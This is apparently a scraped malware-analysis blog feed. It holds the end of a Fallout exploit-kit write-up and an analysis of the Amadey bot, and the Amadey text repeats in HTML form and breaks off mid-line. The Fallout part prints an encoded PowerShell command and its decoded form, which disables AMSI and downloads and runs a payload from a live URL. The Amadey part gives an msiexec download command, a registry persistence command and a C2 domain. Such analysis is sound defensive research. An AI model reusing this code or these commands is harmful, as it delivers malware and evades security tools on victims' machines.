(v3 + v5) % 0xFFF1; } return v2 + (v3 << 16); } </code></pre></div></div> However, there were interesting changes. Analysis environment detection codes has been added in shellcode. <h3 id="vm-detection">VM Detection</h3> Query hypervisor precense using CPUID. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall zz_vm_detect(unsigned int *this) { unsigned int *v1; // edi unsigned int result; // eax v1 = this; _EAX = 1; __asm { cpuid } result = _ECX >> 31; *v1 = _ECX >> 31; return result; } </code></pre></div></div> <h3 id="process-detection">Process Detection</h3> Get a list of running processes. <img src="https://nao-sec.org/assets/2019-07-09/03.jpg" alt="" /> Convert process name to lower case. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl zz_tolowercase(_BYTE *a1) { int result; // eax while ( 1 ) { result = (char)*a1; if ( !*a1 ) break; if ( (char)*a1 >= 65 && (char)*a1 <= 90 ) *a1 += 32; ++a1; } return result; } </code></pre></div></div> Compare to the following hashes. Once again, It uses the dualaccModFFF1Hash algorithm. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x3F5406DE 0x25CD0541 0x0F050309 0x161803EC 0x19F3044B </code></pre></div></div> <img src="https://nao-sec.org/assets/2019-07-09/04.jpg" alt="" /> Two process names were identified. I do not know the others. <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> hex(dualaccModFFF1Hash("wireshark.exe")) '0x25cd0541' >>> hex(dualaccModFFF1Hash("fiddler.exe")) '0x19f3044b' </code></pre></div></div> Like v3, shellcode downloads, decodes and executes encrypted PowerShell code. <h2 id="powershell">PowerShell</h2> The PowerShell code to be executed is like this. <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe -w hidden -noni -enc dAByAHkAewAkAGwAMQBJAGwAMQA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQA7ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAD0AJABsADEASQBsADEALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQASQAxAEkAbAAxADEAbAAxAEkAbAA9ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAC4ARwBlAHQARgBpAGUAbABkACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFkAVwAxAHoAYQBVAGwAdQBhAFgAUgBHAFkAVwBsAHMAWgBXAFEAPQAnACkAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAkAEkAMQBJAGwAMQAxAGwAMQBJAGwALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AH0AYwBhAHQAYwBoAHsAfQA7AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAIgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAEkAbABJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJADEASQBJADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAEkASQBsAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAMQBsAEkAbAAxAEkAMQBJADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAEkAMQBsAGwAMQBJAGwAMQBJADEAbAB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAGwASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAbAAxADEAMQBJAEkASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxAGwASQBsADEAbABsADEASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABJAEkASQBsADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAGwAMQAxAEkAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEASQBsAEkAbAAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAGwASQBJAEkAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAEkAMQBsAEkAbABJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbAAxAEkAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAASQBsAEkASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABJAGwAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBsAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbAAxAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbABJAGwAbABsAEkAMQBJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxAEkASQBJADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsADEASQBsADEAMQBJAEkASQB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAiACwAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoAHMAdAByAGkAbgBnACAASQBJAGwASQBJAEkALABzAHQAcgBpAG4AZwAgAEkAbABJAGwASQAsAEkAbgB0AFAAdAByACAASQAxADEAbAAxAEkALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAMQAsAGIAbwBvAGwAIABJAGwASQAxADEASQBJADEAMQAxADEALAB1AGkAbgB0ACAAbAAxADEAMQBJACwASQBuAHQAUAB0AHIAIABsAEkASQBJADEASQBsAGwASQAsAHMAdAByAGkAbgBnACAASQAxAEkAbAAxAGwASQAsAHIAZQBmACAAbABJADEAbABsADEASQBsADEASQAxAGwAIABsAGwAMQAxAEkASQBsADEASQAsAG8AdQB0ACAASQAxAGwASQBJADEASQBsADEAIABsAEkASQAxAEkASQApADsAfQAiADsAJABsAGwAbAAxAEkAbABsAEkAMQA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAEkAMQBsADEAMQBJADEAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAGEAaABlAHIAbwA0AHUALgBjAG8AbQAvADEAOQA1ADAALQAwADEALQAxADEALwBPADgAWgByACcAOwBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASgBHAE4AcwBhAFQAMABvAFQAbQBWADMATABVADkAaQBhAG0AVgBqAGQAQwBCAE8AWgBYAFEAdQBWADIAVgBpAFEAMgB4AHAAWgBXADUAMABLAFQAcwBrAFkAMgB4AHAATABrAGgAbABZAFcAUgBsAGMAbgBOAGIASgAxAFYAegBaAFgASQB0AFEAVwBkAGwAYgBuAFEAbgBYAFQAMABuAFMAagBVADMAVQBEAGwANQBNAFcAawB6AE0ARQAwAHgATQBEAEoAWQBOAFMAYwA3AEoARwBOAHMAYQBTADUARQBiADMAZAB1AGIARwA5AGgAWgBFAFoAcABiAEcAVQBvAEoARQBrAHgAYgBEAEUAeABTAFQARQBzAEoARwB4AHMAYgBEAEYASgBiAEcAeABKAE0AUwBrADcAJwApACkAfABpAGUAeAA7ACQASQAxAEkAMQBsADEASQBJAGwAbABJADEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABJADEAbABsADEASQBsADEASQAxAGwAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBsAEkASQAxAD0AMAB4ADAAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBJAEkAbABJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACkAOwAkAEkASQBsADEASQBsADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQA7AFsAbAAxAEkAbAAxADEASQBJAEkAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQBJAGwAbABJADEALAAkAGwAbABsADEASQBsAGwASQAxACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACwAWwByAGUAZgBdACQASQBJAGwAMQBJAGwAMQBJACkAfABvAHUAdAAtAG4AdQBsAGwAOwA= </code></pre></div></div> Let’s decode and clean. <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>try { $l1Il1 = [Ref].Assembly; $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils"); $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static'); $I1Il11l1Il.SetValue($null, $true); } catch { }; Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}"; $lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp"; $I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr'; $cli = (New-Object Net.WebClient); $cli.Headers['User-Agent'] = 'J57P9y1i30M102X5'; $cli.DownloadFile($I1l11I1, $lll1IllI1); $I1I1l1IIllI1 = New-Object lI1ll1Il1I1l; $I1I1l1IIllI1.IlII1 = 0x0; $I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1); $IIl1Il1I = New-Object I1lII1Il1; [l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null; </code></pre></div></div> Thus the malware is downloaded and executed. <h2 id="conclusion">Conclusion</h2> Fallout has been heavily updated, making analysis very difficult. Very sophisticated techniques such as Diffie-Hellman key exchange, VM detection, process detection, etc. are used. We need to be careful as they may be updated in the future.
Analyzing Amadey

Sat, 27 Apr 2019 15:00:00 -0000

Initial Access Amedey is installed by msiexec.exe when you open a malicious excel file. From the document file technique, the threat actor is considered TA505. Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784 The download URL is as follows: msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' First payload First payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner. Amadey The dumped PE is compiled with MinGW. PE: compiler: MinGW(-)[-] PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32] It contains symbol information. Amedey has the following functions: _Z10aBypassUACv _Z10aCharToIntPc _Z10aGetOsArchv _Z10aIntToChari _Z11aAutoRunSetPc _Z11aCheckAdminv _Z11aCreateFilePc _Z11aFileExistsPKc _Z11aGetTempDirv _Z11aProcessDllPcS_ _Z11aProcessExePcS_S_S_ _Z11aRunAsAdminPc _Z12aGetHostNamev _Z12aGetSelfPathv _Z12aGetUserNamev _Z12aProcessTaskPc _Z12aResolveHostPc _Z12aWinSockPostPcS_S_ _Z13aDropToSystemPc _Z13aGetProcessILv _Z14aCreateProcessPc _Z14aGetProgramDirv _Z15aUrlMonDownloadPcS_ _Z16aDirectoryExistsPc _Z16aExtractFileNamePc _Z16aGetHomeDriveDirv _Z16aProcessDllLocalPcS_S_S_ _Z16aProcessExeLocalPcS_S_S_ _Z19aGetSelfDestinationi _Z5aCopyPcii _Z5aParsPcS_ _Z6aBasici _Z6aGetIdv _Z6aGetOsv _Z6aMkDirPc _Z7aPathAVPc _Z7aRaportPcS_ _Z8aCheckAVv _Z8aDecryptPc _Z8aPosLastPcS_ _Z9aCopyFilePcS_ _Z9aFileSizePc _Z9aFillCharPc _Z9aFreeFilePc _Z9aPosFirstPcS_ _Z9aRunDll32PcS_ The main function is as follows. int __cdecl main(int _Argc,char **_Argv,char **_Env) { char *pcVar1; /* 0x3ac8 97 main */ FUN_00404020(); FUN_00403cc0(); _Z10aBypassUACv(); pcVar1 = _Z12aGetSelfPathv(); _Z13aDropToSystemPc(pcVar1); pcVar1 = _Z19aGetSelfDestinationi(0); _Z11aAutoRunSetPc(pcVar1); _Z6aBasici(0); return 0; } The _Z6aBasici function is as follows. /* WARNING: Globals starting with '_' overlap smaller symbols at the same address */ void __cdecl _Z6aBasici(int param_1) { char *_Source; uint uVar1; int iVar2; /* 0x33fe 32 _Z6aBasici */ FUN_00404020(); _Z9aFillCharPc(&stack0xffffeff4); _Z9aFillCharPc(&stack0xffffddf4); _Z9aFillCharPc(&stack0xffffdbf4); _Source = _Z8aDecryptPc(&aDomain); strcat(&stack0xffffddf4,_Source); _Source = _Z8aDecryptPc(&aScript); strcat(&stack0xffffdbf4,_Source); _Source = _Z8aDecryptPc(&aParam0); strcat(&stack0xffffeff4,_Source); _Source = _Z6aGetIdv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aVers); strcat(&stack0xffffeff4,_Source); uVar1 = _Z11aCheckAdminv(); if ((uVar1 & 0xff) == 1) { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"1"); } else { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"0"); } _Source = _Z8aDecryptPc(&aParam3); strcat(&stack0xffffeff4,_Source); _Source = _Z10aGetOsArchv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam4); strcat(&stack0xffffeff4,_Source); _Source = _Z10aIntToChari(param_1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam5); strcat(&stack0xffffeff4,_Source); iVar2 = _Z6aGetOsv(); _Source = _Z10aIntToChari(iVar2); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam6); strcat(&stack0xffffeff4,_Source); uVar1 = _Z8aCheckAVv(); _Source = _Z10aIntToChari(uVar1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam7); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetHostNamev(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam8); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetUserNamev(); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"&"); if (param_1 == 0) { do { _Z9aFillCharPc(&stack0xffffdff4); _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); strcat(&stack0xffffdff4,_Source); _Z5aParsPcS_(&stack0xffffdff4,"#"); Sleep(_aTimeOut); } while( true ); } if (param_1 == 1) { _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); } return; } Some important parameters are encoded. However, the encoding algorithm is very simple. key is 8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7 Finally, we analyze the decoded string and the name of the function in which it was used. _Z11aAutoRunSetPc AutoRunCmd : REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d _Z8aCheckAVv AV00 : AVAST Software AV01 : Avira AV02 : Kaspersky Lab AV03 : ESET AV04 : Panda Security AV05 : Doctor Web AV06 : AVG AV07 : 360TotalSecurity AV08 : Bitdefender AV09 : Norton AV10 : Sophos AV11 : Comodo _Z12aWinSockPostPcS_S_ CMD0 : <c> CMD1 : <d> _Z11aProcessDllPcS_ dll : dll _Z7aRaportPcS_, _Z6aBasici domain : gohaiendo[.]com _Z19aGetSelfDestinationi DropDir : f64a428dfd DropName : cmualrc.exe _Z11aProcessExePcS_S_S_ exe : exe _Z14aGetProgramDirv GetProgDir : ProgramData\ _Z10aGetOsArchv, _Z6aGetOsv OS_AR0 : kernel32.dll OS_AR1 : GetNativeSystemInfo _Z6aBasici Param0 : id= Param1 : &vs= Param2 : &ar= Param3 : &bi= Param4 : &lv= Param5 : &os= Param6 : &av= Param7 : &pc= Param8 : &un= Vers : 1.22 ZoneIdent : :Zone.Identifier _Z12aWinSockPostPcS_S_ Post0 : 1310 Post1 : HTTP/1.1 Post2 : Accept: / Post3 : Content-Type: application/x-www-form-urlencoded Post4 : Host: Post5 : Content-Length: Post6 : POST / _Z11aRunAsAdminPc RunAs : runas _Z9aRunDll32PcS_ RunDll_0 : rundll32.exe _Z7aRaportPcS_, _Z6aBasici Script : ppk/index.php _Z11aCheckAdminv Shell : SHELL32.DLL _Z14aCreateProcessPc, _Z6aBasici TimeOut : 40133-98-10017 _Z15aUrlMonDownloadPcS_ URLMon_0 : urlmon URLMon_1 : URLDownloadToFileA Here is the simple python script. ''' domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85] AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00 AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94] AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92] AV03=[0x7D, 0xB8, 0xA7, 0xB8] AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD] AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B] AV06=[0x79, 0xBB, 0xA9] AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2] AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5] AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7] AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC] AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8] CMD0=[0x74, 0xC8, 0xA0] CMD1=[0x74, 0xC9, 0xA0] DLL=[0x9C, 0xD1, 0xCE] DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D] DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98] exe=[0x9D, 0xDD, 0xC7] GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE] OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE] OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F] Param0=[0xA1, 0xC9, 0x9F] Param1=[0x5E, 0xDB, 0xD5, 0xA1] Param2=[0x5E, 0xC6, 0xD4, 0xA1] Param3=[0x5E, 0xC7, 0xCB, 0xA1] Param4=[0x5E, 0xD1, 0xD8, 0xA1] Param5=[0x5E, 0xD4, 0xD5, 0xA1] Param6=[0x5E, 0xC6, 0xD8, 0xA1] Param7=[0x5E, 0xD5, 0xC5, 0xA1] Param8=[0x5E, 0xDA, 0xD0, 0xA1] Post0=[0x45, 0x6F] Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67] Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D] Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C] Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59] Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59] Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68] RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6] RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50] Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0] Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F] TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44] URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7] URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77] Vers=[0x69, 0x93, 0x94, 0x96] ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB] ''' encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] Key="8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7" c=0 while(1): length = len(encoded_str) if length <= c: break length = len(Key); print(chr(encoded_str[c] - ord(Key[c % length])), end='') #print(encoded_str[c] - ord(Key[c % length]), end='') c += 1 References https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/

<h2 id="initial-access">Initial Access</h2> Amedey is installed by msiexec.exe when you open a malicious excel file. From the document file technique, the threat actor is considered TA505. <ul> <li><a href="https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/">Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently</a></li> <li><a href="https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware">Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware</a></li> </ul> <img src="https://nao-sec.org/assets/2019-04-28/01.jpg" width="100%" /> https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784 The download URL is as follows: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' </code></pre></div></div> <h2 id="first-payload">First payload</h2> First payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner. <img src="https://nao-sec.org/assets/2019-04-28/02.jpg" width="100%" /> <h2 id="amadey">Amadey</h2> The dumped PE is compiled with MinGW. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PE: compiler: 